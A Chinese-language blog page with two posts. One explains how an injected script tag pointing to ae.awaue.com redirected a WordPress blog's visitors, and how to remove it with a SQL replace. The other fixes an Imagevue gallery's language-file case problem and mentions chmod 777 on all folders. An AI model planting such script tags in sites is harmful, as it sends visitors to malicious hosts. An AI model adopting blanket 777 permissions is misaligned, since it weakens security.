Posts Tagged ‘程序架设’

WordPress重定向漏洞

今天访问自己blog时突然发现特慢,半天右栏都没加载出来。看了下状态栏,发现卡在一个url上过不去(http://ae.awaue.com/7),我想了又想,重来没有调用过外站资源,特别时这个陌生的站。第一反应就是可能被挂马了,上网查了一下没有太具体的说法,访问了下上面这个url也打不开,心生可疑。因为首页里只发现两条如下脚本,想实在没有方法解决,就先干掉这两个,过段时间看看情况。 <script src=”http://ae.awaue.com/7″></script> 症状: 浏览你网站文章的用户可能被重定向的第三方网站。(我今天遇到过一次,开始还纳闷我是点了什么跳到一个不认识的网站去的) 也可能被重定向到googlesearch.com,不过这个已被禁用。 但好在最后还是依赖(mt)自己的wiki解决了这个问题,我绝非第一个遇到这问题,以后可能会复发,别的WPer也可能遇到,留个存档,出问题好回查。 解决方案如下,范讲一下,不只针对(mt)主机: 登录你主机的管理后台,进入数据库管理,也就是mysqladmin 在左边列表里找到你的wordpress所在数据库,如db_blog 点击进入后,在顶部找到”SQL”一项,点击 然后我们在输入框里输入以下语句,目的查找wp_posts里所有信息,并替换掉其中有害信息: UPDATE wp_posts SET post_content = replace( post_content, ‘<script src=”http://ae.awaue.com/7″></script>’, ‘ ‘) 接下来运行这段语句 最后看一下影响了多少行,如果是0,说明你还没中招。我的跑了一下共替换了1200多条…… 需要注意的是:上面的例子语句是举的默认情况,如果你的表名不是以wp_开头的,请换成你自己的,不要直接复制粘贴。 目前已发现的可疑脚本有以下两个: ae.awaue.com/7 ie.eracou.com/3 如果未来发现有新的可疑脚本,请随时留意这里的更新

Imagevue架在(mt)上遇到的问题与解决

年前给我的Flickr续费,直接买了两年。两天后,Flickr farm5集群被封,导致很多新照片都看不到了。就连现在我自己更新图片都要翻墙更新才行,我在考虑要不要把图片名称、描述、Tag等都改成英文,以便扩大在海外的知名度…… 在欣赏过一个朋友的图片专题后,被画面和音乐深深感动,决定搭一个环境给自己,记录属于自己的感动。相册程序采用Imagevue,Flash+PHP的,效果很炫,同时能给我充分的定制空间。不过原本简单的事,折腾了我一天,上传到我的mediatemple后一直停在首页loading,无法进行下一步。在本地环境设置好的,怎么可能放到正式环境显示不出来? 按照相关说明,把所有文件夹chmod 777了,还是出不来。但只是前台,后台管理界面可以进,断定程序没问题,可能是某个文件丢失或加载有问题。最后终于找到原因,原来语言包xml加载失败,导致卡在loading界面: 上图标红处就是问题所在。FTP上去查看文件都在,并没有缺失,点过去却找不到文件。最后居然是因为严格区分大小写问题,后台setting-language里,我写的是English,后改成english,问题解决。 上图红框处,必须小写。之所以开始想都没想过,是因为在后台Language里给的提示就是English,我直接粘过来的…… 同时,正如各位网友所说,Imagevue对中文的支持确实不咋地,慎用。图片名称和描述用中文,可能会出现菜单无法弹开、无法查看下一张图片。还有在Firefox下点图片,会出横竖滚动条,还没查,希望是样式问题,官网demo也有同样问题。